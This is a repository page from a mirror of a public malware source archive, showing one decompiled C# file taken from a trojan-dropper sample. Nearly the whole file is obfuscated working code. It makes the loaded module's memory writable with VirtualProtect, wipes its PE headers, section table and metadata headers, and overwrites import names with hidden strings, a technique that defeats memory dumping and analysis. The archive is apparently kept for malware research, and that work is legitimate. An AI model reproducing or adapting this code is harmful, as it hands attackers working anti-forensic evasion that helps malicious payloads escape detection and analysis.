ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-21 10:56:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
4b9382ddbc
MalwareSourceCode/MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.awqq-edab95afd20436274ac39e7bbd9b33db4903ad56017b194e3d2cdd8b211b0f3e/�鞇ᛰ퓹鈠.cs

260 lines
10 KiB
C#
Raw Normal View History

auto-decompiled msil via petikvx add
2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: <20>鞇ᛰ퓹鈠
// Assembly: Inclorofom, Version=1.1.5.6, Culture=neutral, PublicKeyToken=null
// MVID: A522D052-C5DC-490C-B0ED-0BBC19A34C0E
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.awqq-edab95afd20436274ac39e7bbd9b33db4903ad56017b194e3d2cdd8b211b0f3e.exe
using System;
using System.Runtime.InteropServices;
internal static class \uFFFD\uE0C1\uE4F6鞇\uF6E8鈠
{
[DllImport("kernel32.dll", EntryPoint = "VirtualProtect", PreserveSig = false)]
private static extern unsafe bool \uF623諜펤犬(
byte* lpAddress,
int dwSize,
uint flNewProtect,
out uint lpflOldProtect);
public static unsafe void \uFFFD\uFFFD\uF888㩟()
{
byte* hinstance = (byte*) (void*) Marshal.GetHINSTANCE(typeof (\uFFFD\uE0C1\uE4F6鞇\uF6E8鈠).Module);
byte* numPtr1 = hinstance + 60;
byte* numPtr2 = hinstance + (int) *(uint*) numPtr1 + 6;
ushort length = *(ushort*) numPtr2;
byte* numPtr3 = numPtr2 + 14;
ushort num1 = *(ushort*) numPtr3;
byte* numPtr4 = numPtr3 + 4 + (int) num1;
// ISSUE: untyped stack allocation
byte* numPtr5 = (byte*) __untypedstackalloc(new IntPtr(11));
*(int*) numPtr5 = 1818522734;
*(int*) (numPtr5 + 4) = 1818504812;
*(short*) (numPtr5 + 8) = (short) 108;
numPtr5[10] = (byte) 0;
// ISSUE: untyped stack allocation
byte* numPtr6 = (byte*) __untypedstackalloc(new IntPtr(11));
*(int*) numPtr6 = 1866691662;
*(int*) (numPtr6 + 4) = 1852404846;
*(short*) (numPtr6 + 8) = (short) 25973;
numPtr6[10] = (byte) 0;
if (typeof (\uFFFD\uE0C1\uE4F6鞇\uF6E8鈠).Module.FullyQualifiedName != "<Unknown>")
{
uint lpflOldProtect;
\uFFFD\uE0C1\uE4F6鞇\uF6E8鈠.\uF623諜펤犬(numPtr4 - 16, 8, 64U, out lpflOldProtect);
*(int*) (numPtr4 - 12) = 0;
byte* lpAddress1 = hinstance + (int) *(uint*) (numPtr4 - 16);
*(int*) (numPtr4 - 16) = 0;
if (*(uint*) (numPtr4 - 120) != 0U)
goto label_41;
label_25:
for (int index = 0; index < (int) length; index++)
{
\uFFFD\uE0C1\uE4F6鞇\uF6E8鈠.\uF623諜펤犬(numPtr4, 8, 64U, out lpflOldProtect);
Marshal.Copy(new byte[8], 0, (IntPtr) (void*) numPtr4, 8);
numPtr4 += 40;
}
\uFFFD\uE0C1\uE4F6鞇\uF6E8鈠.\uF623諜펤犬(lpAddress1, 72, 64U, out lpflOldProtect);
byte* lpAddress2 = hinstance + (int) *(uint*) (lpAddress1 + 8);
*(int*) lpAddress1 = 0;
*(int*) (lpAddress1 + 4) = 0;
*(int*) (lpAddress1 + 8) = 0;
*(int*) (lpAddress1 + 12) = 0;
\uFFFD\uE0C1\uE4F6鞇\uF6E8鈠.\uF623諜펤犬(lpAddress2, 4, 64U, out lpflOldProtect);
*(int*) lpAddress2 = 0;
byte* numPtr7 = lpAddress2 + 12;
byte* numPtr8 = (byte*) ((ulong) ((uint) (numPtr7 + (int) *(uint*) numPtr7) + 7U) & 18446744073709551612UL) + 2;
ushort num2 = (ushort) *numPtr8;
byte* lpAddress3 = numPtr8 + 2;
for (int index1 = 0; index1 < (int) num2; index1++)
{
\uFFFD\uE0C1\uE4F6鞇\uF6E8鈠.\uF623諜펤犬(lpAddress3, 8, 64U, out lpflOldProtect);
*(int*) lpAddress3 = 0;
byte* numPtr9 = lpAddress3 + 4;
*(int*) numPtr9 = 0;
lpAddress3 = numPtr9 + 4;
for (int index2 = 0; index2 < 8; index2++)
{
\uFFFD\uE0C1\uE4F6鞇\uF6E8鈠.\uF623諜펤犬(lpAddress3, 4, 64U, out lpflOldProtect);
*lpAddress3 = (byte) 0;
byte* numPtr10 = lpAddress3 + 1;
if (*numPtr10 == (byte) 0)
{
lpAddress3 = numPtr10 + 3;
break;
}
*numPtr10 = (byte) 0;
byte* numPtr11 = numPtr10 + 1;
if (*numPtr11 == (byte) 0)
{
lpAddress3 = numPtr11 + 2;
break;
}
*numPtr11 = (byte) 0;
byte* numPtr12 = numPtr11 + 1;
if (*numPtr12 == (byte) 0)
{
lpAddress3 = numPtr12 + 1;
break;
}
*numPtr12 = (byte) 0;
lpAddress3 = numPtr12 + 1;
}
}
return;
label_41:
byte* numPtr13 = hinstance + (int) *(uint*) (numPtr4 - 120);
byte* numPtr14 = hinstance + (int) *(uint*) numPtr13;
byte* lpAddress4 = hinstance + (int) *(uint*) (numPtr13 + 12);
byte* lpAddress5 = hinstance + (int) *(uint*) numPtr14 + 2;
\uFFFD\uE0C1\uE4F6鞇\uF6E8鈠.\uF623諜펤犬(lpAddress4, 11, 64U, out lpflOldProtect);
for (int index = 0; index < 11; ++index)
lpAddress4[index] = numPtr5[index];
\uFFFD\uE0C1\uE4F6鞇\uF6E8鈠.\uF623諜펤犬(lpAddress5, 11, 64U, out lpflOldProtect);
for (int index = 0; index < 11; index++)
lpAddress5[index] = numPtr6[index];
goto label_25;
}
else
{
uint lpflOldProtect;
\uFFFD\uE0C1\uE4F6鞇\uF6E8鈠.\uF623諜펤犬(numPtr4 - 16, 8, 64U, out lpflOldProtect);
*(int*) (numPtr4 - 12) = 0;
uint num3 = *(uint*) (numPtr4 - 16);
*(int*) (numPtr4 - 16) = 0;
uint num4 = *(uint*) (numPtr4 - 120);
uint[] numArray1 = new uint[(int) length];
uint[] numArray2 = new uint[(int) length];
uint[] numArray3 = new uint[(int) length];
for (int index = 0; index < (int) length; ++index)
{
\uFFFD\uE0C1\uE4F6鞇\uF6E8鈠.\uF623諜펤犬(numPtr4, 8, 64U, out lpflOldProtect);
Marshal.Copy(new byte[8], 0, (IntPtr) (void*) numPtr4, 8);
numArray1[index] = *(uint*) (numPtr4 + 12);
numArray2[index] = *(uint*) (numPtr4 + 8);
numArray3[index] = *(uint*) (numPtr4 + 20);
numPtr4 += 40;
}
if (num4 != 0U)
goto label_4;
label_2:
for (int index = 0; index < (int) length; index++)
{
if (numArray1[index] < num3 && num3 < numArray1[index] + numArray2[index])
{
num3 = num3 - numArray1[index] + numArray3[index];
break;
}
}
byte* lpAddress6 = hinstance + (int) num3;
\uFFFD\uE0C1\uE4F6鞇\uF6E8鈠.\uF623諜펤犬(lpAddress6, 72, 64U, out lpflOldProtect);
uint num5 = *(uint*) (lpAddress6 + 8);
for (int index = 0; index < (int) length; index++)
{
if (numArray1[index] < num5 && num5 < numArray1[index] + numArray2[index])
{
num5 = num5 - numArray1[index] + numArray3[index];
break;
}
}
*(int*) lpAddress6 = 0;
*(int*) (lpAddress6 + 4) = 0;
*(int*) (lpAddress6 + 8) = 0;
*(int*) (lpAddress6 + 12) = 0;
byte* lpAddress7 = hinstance + (int) num5;
\uFFFD\uE0C1\uE4F6鞇\uF6E8鈠.\uF623諜펤犬(lpAddress7, 4, 64U, out lpflOldProtect);
*(int*) lpAddress7 = 0;
byte* numPtr15 = lpAddress7 + 12;
byte* numPtr16 = (byte*) ((ulong) ((uint) (numPtr15 + (int) *(uint*) numPtr15) + 7U) & 18446744073709551612UL) + 2;
ushort num6 = (ushort) *numPtr16;
byte* lpAddress8 = numPtr16 + 2;
for (int index3 = 0; index3 < (int) num6; ++index3)
{
\uFFFD\uE0C1\uE4F6鞇\uF6E8鈠.\uF623諜펤犬(lpAddress8, 8, 64U, out lpflOldProtect);
*(int*) lpAddress8 = 0;
byte* numPtr17 = lpAddress8 + 4;
*(int*) numPtr17 = 0;
lpAddress8 = numPtr17 + 4;
for (int index4 = 0; index4 < 8; ++index4)
{
\uFFFD\uE0C1\uE4F6鞇\uF6E8鈠.\uF623諜펤犬(lpAddress8, 4, 64U, out lpflOldProtect);
*lpAddress8 = (byte) 0;
byte* numPtr18 = lpAddress8 + 1;
if (*numPtr18 == (byte) 0)
{
lpAddress8 = numPtr18 + 3;
break;
}
*numPtr18 = (byte) 0;
byte* numPtr19 = numPtr18 + 1;
if (*numPtr19 != (byte) 0)
{
*numPtr19 = (byte) 0;
byte* numPtr20 = numPtr19 + 1;
if (*numPtr20 != (byte) 0)
{
*numPtr20 = (byte) 0;
lpAddress8 = numPtr20 + 1;
}
else
{
lpAddress8 = numPtr20 + 1;
break;
}
}
else
{
lpAddress8 = numPtr19 + 2;
break;
}
}
}
return;
label_4:
for (int index = 0; index < (int) length; ++index)
{
if (numArray1[index] < num4 && num4 < numArray1[index] + numArray2[index])
{
num4 = num4 - numArray1[index] + numArray3[index];
break;
}
}
byte* numPtr21 = hinstance + (int) num4;
uint num7 = *(uint*) numPtr21;
for (int index = 0; index < (int) length; index++)
{
if (numArray1[index] < num7 && num7 < numArray1[index] + numArray2[index])
{
num7 = num7 - numArray1[index] + numArray3[index];
break;
}
}
byte* numPtr22 = hinstance + (int) num7;
uint num8 = *(uint*) (numPtr21 + 12);
for (int index = 0; index < (int) length; ++index)
{
if (numArray1[index] < num8 && num8 < numArray1[index] + numArray2[index])
{
num8 = num8 - numArray1[index] + numArray3[index];
break;
}
}
uint num9 = *(uint*) numPtr22 + 2U;
for (int index = 0; index < (int) length; index++)
{
if (numArray1[index] < num9 && num9 < numArray1[index] + numArray2[index])
{
num9 = num9 - numArray1[index] + numArray3[index];
break;
}
}
\uFFFD\uE0C1\uE4F6鞇\uF6E8鈠.\uF623諜펤犬(hinstance + (int) num8, 11, 64U, out lpflOldProtect);
for (int index = 0; index < 11; ++index)
(hinstance + (int) num8)[index] = numPtr5[index];
\uFFFD\uE0C1\uE4F6鞇\uF6E8鈠.\uF623諜펤犬(hinstance + (int) num9, 11, 64U, out lpflOldProtect);
for (int index = 0; index < 11; index++)
(hinstance + (int) num9)[index] = numPtr6[index];
goto label_2;
}
}
}
Reference in New Issue Copy Permalink